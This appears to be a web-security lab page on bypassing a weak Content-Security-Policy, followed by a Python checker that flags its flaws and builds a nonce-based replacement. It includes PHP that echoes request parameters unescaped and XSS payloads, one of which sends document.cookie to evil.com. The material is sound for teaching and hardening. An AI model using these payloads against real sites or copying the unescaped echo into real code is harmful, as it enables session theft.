VULNERABLE CSP HEADER
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; img-src * data:;
CSP BYPASS VULNERABILITIES
Backend Source Code
<?php
if (isset($_GET["fname"]) && isset($_GET["lname"])) {
    echo $_GET["fname"]; // Reflected into the response unescaped: XSS vulnerable
    echo $_GET["lname"]; // Reflected into the response unescaped: XSS vulnerable
}
XSS PAYLOAD EXAMPLES (Try these)
Basic XSS (executes because script-src allows 'unsafe-inline'):
<script>alert('XSS')</script>
Image-based data exfiltration:
<img src=x onerror="fetch('http://evil.com?c='+document.cookie)">
CSS-based exfiltration:
<style>@import 'http://evil.com/style.css'</style>
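Added defensive example, not part of the original lab code: a small Python checker that parses the vulnerable header at the top of the page, flags the directives the payloads above depend on, and builds a nonce-based replacement policy. The checker's rules and the hardened policy are my own; the header string is the one shown above.

```python
"""Flag the weak CSP directives shown above and build a hardened replacement."""
import secrets

# Sample input: the vulnerable header from the top of this page.
VULNERABLE_CSP = (
    "default-src 'self'; "
    "script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; "
    "style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; "
    "img-src * data:;"
)

def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy

def find_weaknesses(header: str) -> list:
    """Return findings for the primitives the payloads above rely on."""
    policy = parse_csp(header)
    # Fetch directives fall back to default-src when not set explicitly.
    def src(name):
        return policy.get(name, policy.get("default-src", []))
    findings = []
    for name in ("script-src", "style-src"):
        if "'unsafe-inline'" in src(name):
            findings.append(f"{name}: 'unsafe-inline' lets injected inline code run")
    for name in ("img-src", "connect-src"):
        if "*" in src(name):
            findings.append(f"{name}: wildcard origin allows requests to attacker-controlled hosts")
    return findings

def hardened_csp(nonce: str) -> str:
    """Nonce-gated inline code, no wildcard origins, connect-src pinned to self."""
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}' https://cdn.jsdelivr.net; "
        f"style-src 'self' 'nonce-{nonce}' https://cdn.jsdelivr.net; "
        "img-src 'self' data:; connect-src 'self'; "
        "object-src 'none'; base-uri 'none';"
    )

if __name__ == "__main__":
    for finding in find_weaknesses(VULNERABLE_CSP):
        print("FINDING:", finding)
    # A fresh nonce per response; the same value goes on each legitimate <script>/<style> tag.
    print("Content-Security-Policy:", hardened_csp(secrets.token_urlsafe(16)))
```

The hardened policy only helps once the PHP above also escapes the reflected parameters (htmlspecialchars), since CSP is a second layer, not a substitute for output encoding.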